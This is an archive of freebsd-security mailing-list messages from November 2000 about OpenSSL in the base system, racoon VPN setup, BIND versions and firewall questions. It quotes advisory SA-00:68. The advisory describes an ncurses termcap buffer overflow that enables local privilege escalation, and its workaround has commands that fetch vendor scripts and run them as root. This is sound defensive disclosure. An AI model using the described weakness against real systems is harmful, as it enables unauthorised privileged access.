Openssl is already in the base system :: :: So what is the deal? I installed all the ports and added lynx and bash. :: That and configuring tcp_wrappers. Nothing else. Why am I getting this :: error? :: :: my thanks in advance, :: Carlos Andrade :: ---- :: Carlos A. Andrade :: IS Manager :: RJS Technologies :: 915.845.5228 ext 13 915.845.2119 fax :: carlos@rjstech.com :: :: :: :: :: To Unsubscribe: send mail to majordomo@FreeBSD.org :: with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 16:31: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from sunny.fishnet.com (sunny.fishnet.com [209.150.200.6]) by hub.freebsd.org (Postfix) with ESMTP id DE0EC37B479 for ; Mon, 13 Nov 2000 16:31:03 -0800 (PST) Received: from walleye.corp.fishnet.com (209.150.192.114) by sunny.fishnet.com (5.0.048) id 39FECC320033D041; Mon, 13 Nov 2000 18:30:55 -0600 Message-ID: From: "Hudson, Henrik H." To: "'carlos@rjstech.com'" Cc: "'security@freebsd.org'" Subject: RE: more pestering from the newbie Date: Mon, 13 Nov 2000 18:32:22 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I may be wrong, but you need to install the security libraries on install? or CVS them down?which are in part made up of the openssl libraries? --- Henrik Hudson > -----Original Message----- > From: owner-freebsd-security@FreeBSD.ORG > [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Carlos Andrade > Sent: Monday, November 13, 2000 18:10 > To: security@FreeBSD.ORG > Subject: more pestering from the newbie > > > I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on > OpenSSH. When I goto /usr/ports/security/openssh and do > :make install > it states that OpenSSH needs the openssl library > > so I go to /usr/ports/security/openssl > :make install > the system reports that Openssl is already in the base system > > So what is the deal? I installed all the ports and added > lynx and bash. > That and configuring tcp_wrappers. Nothing else. Why am I > getting this > error? > > my thanks in advance, > Carlos Andrade > ---- > Carlos A. Andrade > IS Manager > RJS Technologies > 915.845.5228 ext 13 915.845.2119 fax > carlos@rjstech.com > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 17: 4: 9 2000 Delivered-To: freebsd-security@freebsd.org Received: from castle.dreaming.org (castle.dreaming.org [209.146.217.193]) by hub.freebsd.org (Postfix) with ESMTP id 70BF937B479 for ; Mon, 13 Nov 2000 17:04:04 -0800 (PST) Received: from cr592943a (cr592943-a.bloor1.on.wave.home.com [24.156.38.199]) by castle.dreaming.org (8.11.1/8.11.1) with SMTP id eAE13mD24724; Mon, 13 Nov 2000 20:03:48 -0500 (EST) (envelope-from mit@mitayai.net) From: "Will Mitayai Keeso Rowe" To: "Erick Mechler" , "Carlos Andrade" Cc: Subject: RE: more pestering from the newbie Date: Mon, 13 Nov 2000 20:04:36 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: <20001113162323.C50021@lucifer.techometer.net> Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org it's actually also good to make sure that the ssh from ports is stopped and then uninstalled (pkg_delete, check /var/db/pkg/ for package name), including /usr/local/etc/rc.d/ entries. Then update your sources and make world. -Mit -----Original Message----- From: owner-freebsd-security@FreeBSD.ORG [mailto:owner-freebsd-security@FreeBSD.ORG]On Behalf Of Erick Mechler Sent: Monday, November 13, 2000 7:23 PM To: Carlos Andrade Cc: security@FreeBSD.ORG Subject: Re: more pestering from the newbie If you're running 4.1.1 then OpenSSL and OpenSSH are installed into the base system, as the error message states. You shouldn't have to install any ports to get either Open{SSL,SSH} to work. ssh is in /usr/bin/ssh; openssl is in /usr/bin/openssl. --Erick At Mon, Nov 13, 2000 at 05:09:41PM -0700, Carlos Andrade said this: :: I did a clean install (again) of FreeBSD 4.1.1.1 and wanted to work on :: OpenSSH. When I goto /usr/ports/security/openssh and do :: :make install :: it states that OpenSSH needs the openssl library :: :: so I go to /usr/ports/security/openssl :: :make install :: the system reports that Openssl is already in the base system :: :: So what is the deal? I installed all the ports and added lynx and bash. :: That and configuring tcp_wrappers. Nothing else. Why am I getting this :: error? :: :: my thanks in advance, :: Carlos Andrade :: ---- :: Carlos A. Andrade :: IS Manager :: RJS Technologies :: 915.845.5228 ext 13 915.845.2119 fax :: carlos@rjstech.com :: :: :: :: :: To Unsubscribe: send mail to majordomo@FreeBSD.org :: with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 18:22:50 2000 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id E3E2C37B4C5 for ; Mon, 13 Nov 2000 18:22:47 -0800 (PST) Received: (qmail 26153 invoked from network); 14 Nov 2000 02:22:40 -0000 Received: from swun.esec.com.au (HELO eSec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 14 Nov 2000 02:22:40 -0000 Message-ID: <3A10A511.B890C921@eSec.com.au> Date: Tue, 14 Nov 2000 13:36:01 +1100 From: Sam Wun Organization: eSec X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: security@FreeBSD.ORG Subject: racoon -> isakmpd References: Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi! Does anyone got a FreeBSD box with racoon working together with a OpenBSD box with isakmpd as a VPN? Our headoffice uses OpenBSD on their firewall and uses isakmpd for VPN, I want to use FreeBSD with racoon but with no sucess. Any working configs out there? Thanks Sam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 18:24:20 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.epylon.com (sf-gw.epylon.com [63.93.9.98]) by hub.freebsd.org (Postfix) with ESMTP id B550B37B479 for ; Mon, 13 Nov 2000 18:24:17 -0800 (PST) Received: by pluto.epylon.lan with Internet Mail Service (5.5.2650.21) id ; Mon, 13 Nov 2000 18:24:15 -0800 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02427F@goofy.epylon.lan> From: Jason DiCioccio To: 'Sam Wun' Cc: security@FreeBSD.ORG Subject: RE: racoon -> isakmpd Date: Mon, 13 Nov 2000 18:24:12 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: multipart/mixed; boundary="----_=_NextPart_000_01C04DE1.FB2E3F0A" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_000_01C04DE1.FB2E3F0A Content-Type: text/plain; charset="gb2312" I would be interested in this too if anyone knows ------- Jason DiCioccio Unix BOFH mailto:jasond@epylon.com 415-593-2761 Direct & Fax 415-593-2900 Main Epylon Corporation 645 Harrison Street, Suite 200 San Francisco, CA 94107 www.epylon.com OK, so you're a Ph.D. Just don't touch anything. -----Original Message----- From: Sam Wun [mailto:swun@eSec.com.au] Sent: Monday, November 13, 2000 6:36 PM Cc: security@FreeBSD.ORG Subject: racoon -> isakmpd Hi! Does anyone got a FreeBSD box with racoon working together with a OpenBSD box with isakmpd as a VPN? Our headoffice uses OpenBSD on their firewall and uses isakmpd for VPN, I want to use FreeBSD with racoon but with no sucess. Any working configs out there? Thanks Sam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message ------_=_NextPart_000_01C04DE1.FB2E3F0A Content-Type: application/octet-stream; name="Jason DiCioccio.vcf" Content-Disposition: attachment; filename="Jason DiCioccio.vcf" BEGIN:VCARD VERSION:2.1 N:DiCioccio;Jason FN:Jason DiCioccio ORG:epylon.com;operations TITLE:UNIX ADMIN ADR;WORK:;;645 Harrison St;San Francisco;CA;94107;usa LABEL;WORK;ENCODING=QUOTED-PRINTABLE:645 Harrison St=0D=0ASan Francisco, CA 94107=0D=0Ausa EMAIL;PREF;INTERNET:Jason.DiCioccio@Epylon.com REV:19990105T135529Z END:VCARD ------_=_NextPart_000_01C04DE1.FB2E3F0A-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 18:25:29 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 56C8D37B479 for ; Mon, 13 Nov 2000 18:25:27 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAE2Qd912347; Mon, 13 Nov 2000 18:26:39 -0800 (PST) (envelope-from kris) Date: Mon, 13 Nov 2000 18:26:38 -0800 From: Kris Kennaway To: "Hudson, Henrik H." Cc: "'carlos@rjstech.com'" , "'security@freebsd.org'" Subject: Re: more pestering from the newbie Message-ID: <20001113182638.A12319@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="fdj2RfSjLxBAspz7" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from hhudson@eschelon.com on Mon, Nov 13, 2000 at 06:32:22PM -0600 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --fdj2RfSjLxBAspz7 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On Mon, Nov 13, 2000 at 06:32:22PM -0600, Hudson, Henrik H. wrote: > I may be wrong, but you need to install the security libraries on install? > or CVS them down?which are in part made up of the openssl libraries? Nope, they're installed by default starting from 4.1.1 Kris --fdj2RfSjLxBAspz7 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoQot4ACgkQWry0BWjoQKWhVwCg7p++AJdPlBFadwdymaeg8F43 560AnRQdy37S+lYlqGpBCmDOLgMdDPid =8QzT -----END PGP SIGNATURE----- --fdj2RfSjLxBAspz7-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 19:57:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from blues.jpj.net (blues.jpj.net [204.97.17.146]) by hub.freebsd.org (Postfix) with ESMTP id DD82D37B479 for ; Mon, 13 Nov 2000 19:57:02 -0800 (PST) Received: from localhost (trevor@localhost) by blues.jpj.net (right/backatcha) with ESMTP id eAE3uuD16037 for ; Mon, 13 Nov 2000 22:56:56 -0500 (EST) Date: Mon, 13 Nov 2000 22:56:55 -0500 (EST) From: Trevor Johnson To: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:68.ncurses In-Reply-To: <20001113235453.B39D637B479@hub.freebsd.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This advisory would be better with a little more information: - it doesn't mention that systems with telnetd linked against a vulnerable version of ncurses are susceptible to a remote DoS that doesn't require the attacker to remain connected (described to me by Esa Etelavuori and confirmed on my 4.1.1-R and 5.0-S systems). - it doesn't mention that the devel/ncurses port, until 2000-11-10, installed a reportedly vulnerable version of the library. - it doesn't mention the report by venglin of problems with 3.x (http://www.securityfocus.com/advisories/2269). On Mon, 13 Nov 2000, FreeBSD Security Advisories wrote: > -----BEGIN PGP SIGNED MESSAGE----- > > ============================================================================= > FreeBSD-SA-00:68 Security Advisory > FreeBSD, Inc. > > Topic: ncurses allows local privilege escalation > > Category: core > Module: ncurses > Announced: 2000-11-13 > Affects: FreeBSD 5.0-CURRENT, 4.x prior to the correction date. > FreeBSD 3.x vulnerability status currently unconfirmed. > Corrected: 2000-10-11 (FreeBSD 4.1.1-STABLE) > Credits: Jouko Pynnonen > FreeBSD only: NO > > I. Background > > ncurses is a text-mode display library used for formatting the output > of applications on a variety of terminals. It is externally > maintained, contributed code which is included in FreeBSD by default. > > II. Problem Description > > There exists an overflowable buffer in the libncurses library in the > processing of cursor movement capabilities. An attacker can force a > privileged application to use the attacker's termcap file containing a > specially crafted terminal entry, which will trigger the vulnerability > when the vulnerable ncurses code is called. This allows them to > execute arbitrary code on the local system with the privileges of the > exploited binary. > > The systat utility included in the FreeBSD base system is known to use > vulnerable ncurses routines. It runs with increased privileges as a > member of the kmem group, which allows it to read from kernel memory > (but not write to it). A process with the ability to read from kernel > memory can monitor privileged data such as network traffic, disk > buffers and terminal activity, and may be able to leverage this to > obtain further privileges on the local system or on other systems, > including root privileges. > > There may be other vulnerable applications included in the FreeBSD 4.x > base system, but no others are confirmed to be vulnerable due to the > difficulty in identifying a complete list of vulnerable ncurses > functions. However the following is a complete list of FreeBSD system > binaries which link against ncurses and run with increased > privileges. They may or may not be vulnerable to exploitation. > > /usr/sbin/lpc > /usr/bin/top > /usr/bin/systat > > FreeBSD 3.x and earlier versions use a very old, customized version of > ncurses which is difficult to update without breaking > backwards-compatibility. The update was made for FreeBSD 4.0, but 3.x > will not be updated to the newer version. At this stage the > vulnerability has not been confirmed in FreeBSD 3.x. > > III. Impact > > Certain setuid/setgid software (including FreeBSD base system > utilities and third party ports/packages) may be vulnerable to a local > exploit yielding privileged access. > > The /usr/bin/systat utility is known to be vulnerable to this problem > in ncurses. At this time is unknown whether /usr/bin/top and > /usr/sbin/lpc are also affected. > > The problems were corrected prior to the release of FreeBSD 4.2. > > IV. Workaround > > It is not feasible to reliably detect binaries which are vulnerable to > the ncurses vulnerability, however the provided utility will scan for > privileged binaries which use ncurses and which may potentially be > vulnerable. Some of the binaries reported may not in fact be > vulnerable, but should be recompiled anyway for maximum assurance of > security. > > Statically linked binaries which are identified as potentially > vulnerable should be recompiled from source code if possible, after > patching and recompiling libncurses, in order to correct the > vulnerability. Dynamically linked binaries will be corrected by > simply patching and recompiling libncurses as described below. > > As an interim measure, consider removing any identified setuid or > setgid binary, removing set[ug]id privileges from the file, or > limiting the file access permissions, as appropriate. > > Of course, it is possible that some of the identified files may be > required for the correct operation of your local system, in which case > there is no clear workaround except for limiting the set of users who > may run the binaries, by an appropriate use of user groups and > removing the "o+x" file permission bit. > > 1) Download the 'scan_ncurses.sh' and 'test_ncurses.sh' scripts from > > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh > ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh > > e.g. with the fetch(1) command: > > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/scan_ncurses.sh > Receiving scan_ncurses.sh (381 bytes): 100% > 381 bytes transferred in 0.1 seconds (7.03 kBps) > # fetch ftp://ftp.freebsd.org/pub/FreeBSD/CERT/tools/SA-00:68/test_ncurses.sh > Receiving test_ncurses.sh (604 bytes): 100% > 604 bytes transferred in 0.1 seconds (6.55 kBps) > > 2) Verify the md5 checksums and compare to the value below: > > # md5 scan_ncurses.sh > MD5 (scan_ncurses.sh) = 597f63af701253f053581aa1821cbac1 > # md5 test_ncurses.sh > MD5 (test_ncurses.sh) = 12491ceb15415df7682e3797de53223e > > 3) Run the scan_ncurses.sh script against your system: > > # chmod a+x ./test_ncurses.sh > # sh scan_ncurses.sh ./test_ncurses.sh / > > This will scan your entire system for setuid or setgid binaries which > make use of the ncurses library. Each returned binary should be > examined (e.g. with 'ls -l' and/or other tools) to determine what > security risk it poses to your local environment, e.g. whether it can > be run by arbitrary local users who may be able to exploit it to gain > privileges. > > 4) Remove the binaries, or reduce their file permissions, as appropriate. > > V. Solution > > Upgrade your vulnerable FreeBSD system to 4.1.1-STABLE after the > correction date, or patch your present system source code and > rebuild. Then run the scan_ncurses.sh script as instructed in section > IV and identify any statically-linked binaries as reported by the > script. These should either be removed, recompiled, or have privileges > restricted to secure them against this vulnerability (since > statically-linked binaries will not be affected by simply recompiling > the shared libncurses library). > > To patch your present system: download the updated ncurses code from > the below location, and execute the following commands as root: > > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz > # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-00:68/ncurses.tar.gz.asc > > Verify the detached PGP signature using your PGP utility. > > cd /usr/src > tar xvfz /path/to/ncurses.tar.gz > cd /usr/src/lib/libncurses > make all > make install > > In contrast to the usual practise, a simple patch fixing the security > vulnerability is not provided because the vendor did not make one > available, and the updated ncurses snapshot which fixed the > vulnerability contains numerous other changes whose purpose and > relation to the fix was unclear. > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.0.4 (FreeBSD) > Comment: For info see http://www.gnupg.org > > iQCVAwUBOhB+8lUuHi5z0oilAQHjtwP9EIqTrWGcF4hzT7o7CrqGSTBWkQ6QhH2g > DfIef15FLYXOoFImpyi1Jlk0V5RcuTTWez+Kpj8/+Yk3+TYuoYT1k08k1YBuBlCH > HYGvhTAdTO9lflUS6uxZzmiRL3ZOjHPS5OXA6ualnaohMVvBjq/f3V7/cSYZLZ1p > KmHPlYgvFPA= > =SlgT > -----END PGP SIGNATURE----- > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Trevor Johnson http://jpj.net/~trevor/gpgkey.txt To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 22:10:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by hub.freebsd.org (Postfix) with ESMTP id 8286537B479 for ; Mon, 13 Nov 2000 22:10:14 -0800 (PST) Received: (from kris@localhost) by citusc17.usc.edu (8.11.1/8.11.1) id eAE6BUY15719; Mon, 13 Nov 2000 22:11:30 -0800 (PST) (envelope-from kris) Date: Mon, 13 Nov 2000 22:11:30 -0800 From: Kris Kennaway To: Trevor Johnson Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:68.ncurses Message-ID: <20001113221129.A15599@citusc17.usc.edu> References: <20001113235453.B39D637B479@hub.freebsd.org> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="TB36FDmn/VVEgNH/" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from trevor@jpj.net on Mon, Nov 13, 2000 at 10:56:55PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --TB36FDmn/VVEgNH/ Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mon, Nov 13, 2000 at 10:56:55PM -0500, Trevor Johnson wrote: > This advisory would be better with a little more information: >=20 > - it doesn't mention that systems with telnetd linked against a vulnerable > version of ncurses are susceptible to a remote DoS that doesn't require > the attacker to remain connected (described to me by Esa Etelavuori > and confirmed on my 4.1.1-R and 5.0-S systems). This is a separate advisory under preparation, since it's really a separate problem. > - it doesn't mention that the devel/ncurses port, until 2000-11-10, > installed a reportedly vulnerable version of the library. Oops, that was an oversight. > - it doesn't mention the report by venglin of > problems with 3.x (http://www.securityfocus.com/advisories/2269). I haven't been able to confirm it (and fixing it in 3.x is going to be something of a pain) - I haven't got any 3.x machines to test on. Actually I had something in a previous revision of the advisory which contained stronger language but I toned it down and unintentionally made it sound like we didn't know the problem had been reported. I'll probably update this tomorrow..thanks for the feedback. Kris --TB36FDmn/VVEgNH/ Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjoQ15EACgkQWry0BWjoQKXhRQCdGcw69BAKVYsuTefxlnLTI8nI d7AAn3M7hU0VolNbgDsjoh/HXomrtJzl =xx6c -----END PGP SIGNATURE----- --TB36FDmn/VVEgNH/-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Nov 13 22:14:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from lynx.aba.net.au (lynx.esec.com.au [203.21.84.1]) by hub.freebsd.org (Postfix) with SMTP id 4D8B837B479 for ; Mon, 13 Nov 2000 22:14:27 -0800 (PST) Received: (qmail 31550 invoked from network); 14 Nov 2000 06:14:24 -0000 Received: from swun.esec.com.au (HELO eSec.com.au) (203.21.85.207) by lynx.esec.com.au with SMTP; 14 Nov 2000 06:14:24 -0000 Message-ID: <3A10DB41.926EA1A@eSec.com.au> Date: Tue, 14 Nov 2000 17:27:13 +1100 From: Sam Wun Organization: eSec X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386) X-Accept-Language: en MIME-Version: 1.0 Cc: security@FreeBSD.ORG Subject: Re: racoon -> isakmpd References: <657B20E93E93D4118F9700D0B73CE3EA02427F@goofy.epylon.lan> Content-Type: text/plain; charset=gb2312 Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Can we use isakmpd in FreeBSD instead? If we can use isakmpd in FreeBSD, both ends will be talking to the same protocol. Sam. Jason DiCioccio wrote: > I would be interested in this too if anyone knows > > ------- > Jason DiCioccio > Unix BOFH > > mailto:jasond@epylon.com > > 415-593-2761 Direct & Fax > 415-593-2900 Main > > Epylon Corporation > 645 Harrison Street, Suite 200 > San Francisco, CA 94107 > www.epylon.com > > OK, so you're a Ph.D. Just don't touch anything. > > -----Original Message----- > From: Sam Wun [mailto:swun@eSec.com.au] > Sent: Monday, November 13, 2000 6:36 PM > Cc: security@FreeBSD.ORG > Subject: racoon -> isakmpd > > Hi! > > Does anyone got a FreeBSD box with racoon working together with a > OpenBSD box with isakmpd as a VPN? > > Our headoffice uses OpenBSD on their firewall and uses isakmpd for VPN, > I want to use FreeBSD with racoon but with no sucess. > > Any working configs out there? > > Thanks > Sam. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 6:13:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from rerun.lucentctc.com (rerun.lucentctc.com [199.93.237.2]) by hub.freebsd.org (Postfix) with ESMTP id 339D537B4C5 for ; Tue, 14 Nov 2000 06:13:39 -0800 (PST) Received: by rerun.lucentctc.com with Internet Mail Service (5.5.2650.21) id ; Tue, 14 Nov 2000 09:13:37 -0500 Message-ID: <443F9E4C6D67D4118C9800A0C9DD99D710815D@rerun.lucentctc.com> From: "Cambria, Mike" To: 'Jason DiCioccio' , 'Sam Wun' Cc: security@FreeBSD.ORG Subject: RE: racoon -> isakmpd Date: Tue, 14 Nov 2000 09:13:35 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This isn't an answer to your specific question, but I've been able to get racoon on FreeBSD 4.2-Beta working with a few other IPSec products I've been evaluating. The racoon log file can point you into the right area of the config file which needs to change. The log file of the other end can't hurt either. Make sure that you are using the latest racoon port (racoon-20001017b). The syntax has changed, the man page for racoon.conf updated (but the date of the man page is the same ) All the core dumps I had also went away. A few things I remember: I use anonymous for both remote and sainfo. I haven't tried being specific yet. In your remote directive, make sure your dh_group mataches that of your partner. The log file will tell you what the other end is using and if these match. In your sainfo, comment out the pfs_group (or make sure it matches; again from the log file). Also, I had trouble with the sainfo lifetime byte and lifetime time values. The log complained that the other end sent values where were not even close to what racoon was using. Make them match. Good luck, MikeC Michael C. Cambria Avaya Inc. Former Enterprise Networks Group of Lucent Technologies Voice: (978) 287 - 2807 300 Baker Avenue Fax: (978) 287 - 2810 Concord, Massachusetts 01742 Internet: mcambria@avaya.com -----Original Message----- From: Jason DiCioccio [mailto:Jason.DiCioccio@Epylon.com] Sent: Monday, November 13, 2000 9:24 PM To: 'Sam Wun' Cc: security@FreeBSD.ORG Subject: RE: racoon -> isakmpd I would be interested in this too if anyone knows ------- Jason DiCioccio Unix BOFH mailto:jasond@epylon.com 415-593-2761 Direct & Fax 415-593-2900 Main Epylon Corporation 645 Harrison Street, Suite 200 San Francisco, CA 94107 www.epylon.com OK, so you're a Ph.D. Just don't touch anything. -----Original Message----- From: Sam Wun [mailto:swun@eSec.com.au] Sent: Monday, November 13, 2000 6:36 PM Cc: security@FreeBSD.ORG Subject: racoon -> isakmpd Hi! Does anyone got a FreeBSD box with racoon working together with a OpenBSD box with isakmpd as a VPN? Our headoffice uses OpenBSD on their firewall and uses isakmpd for VPN, I want to use FreeBSD with racoon but with no sucess. Any working configs out there? Thanks Sam. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message << File: Jason DiCioccio.vcf >> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 10:34:28 2000 Delivered-To: freebsd-security@freebsd.org Received: from grimreaper.grondar.za (grimreaper.grondar.za [196.7.18.138]) by hub.freebsd.org (Postfix) with ESMTP id 8ECED37B479 for ; Tue, 14 Nov 2000 10:34:22 -0800 (PST) Received: from grondar.za (localhost [127.0.0.1]) by grimreaper.grondar.za (8.11.1/8.11.1) with ESMTP id eAE9J6132355; Tue, 14 Nov 2000 11:19:11 +0200 (SAST) (envelope-from mark@grondar.za) Message-Id: <200011140919.eAE9J6132355@grimreaper.grondar.za> To: "Nuno Teixeira" Cc: freebsd-security@FreeBSD.ORG Subject: Re: PPP NAT Gateway security References: <00c801c04dc4$12a89220$0200a8c0@n2> In-Reply-To: <00c801c04dc4$12a89220$0200a8c0@n2> ; from "Nuno Teixeira" "Mon, 13 Nov 2000 22:50:05 GMT." Date: Tue, 14 Nov 2000 11:19:06 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > My question is: do I need to configure this machine with firewall, so I can > protect my internal network from the outside net? Only you can answer this question. Only you know what is on your computer, only you know how your computer is configured, only you know how your computer is to be used, only you know what your capabilities are, and only you know what data there is on your hard disk that an attacker may want or may destroy. Your call :-). M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 11:23: 3 2000 Delivered-To: freebsd-security@freebsd.org Received: from bessel.tekniikka.turkuamk.fi (bessel.tekniikka.turkuamk.fi [193.166.133.10]) by hub.freebsd.org (Postfix) with ESMTP id 8B4AF37B4D7 for ; Tue, 14 Nov 2000 11:22:59 -0800 (PST) Received: from localhost (eyurtese@localhost) by bessel.tekniikka.turkuamk.fi (8.9.2/8.9.2) with ESMTP id VAA62394 for ; Tue, 14 Nov 2000 21:22:56 +0200 Date: Tue, 14 Nov 2000 21:22:56 +0200 (WET) From: Evren Yurtesen To: freebsd-security@freebsd.org Subject: BIND Version 8.2.2 patchlevel 7 (Released November 9, 2000) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Isn't there any plans of putting the latest version of bind to the source tree? At the ISC web page it is told that there are 8 bugs about the patchlevel 6 Evren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Nov 14 13:11:23 2000 Delivered-To: freebsd-security@freebsd.org Received: from smtp1.sentex.ca (smtp1.sentex.ca [199.212.134.4]) by hub.freebsd.org (Postfix) with ESMTP id 6B63037B479; Tue, 14 Nov 2000 13:11:10 -0800 (PST) Received: from simoeon.sentex.net (simeon.sentex.ca [209.112.4.47]) by smtp1.sentex.ca (8.11.0/8.11.0) with ESMTP id eAELAUM58899; Tue, 14 Nov 2000 16:10:30 -0500 (EST) Message-Id: <5.0.1.4.0.20001114153658.00a58df0@marble.sentex.ca> X-Sender: mdtpop@marble.sentex.ca X-Mailer: QUALCOMM Windows Eudora Version 5.0.1 Date: Tue, 14 Nov 2000 16:04:04 -0500 To: Mike From: Mike Tancsa Subject: Re: VPN over PPPoE (racoon at fault? - no pilot error) Cc: freebsd-net@freebsd.org, security@freebsd.org In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org OK, thanks very much to Mike Cambria, (mcambria@avaya.com) for suggesting adjusting the lifetime settings. I am cc'ing to security@freebsd.org in case others run into this problem of using racoon over slower than ethernet links. Setup is a FreeBSD box running PPPoE over DSL across a few hops to another FreeBSD machine on the ethernet. The trick is to bump up the lifetime value in racoon.conf and 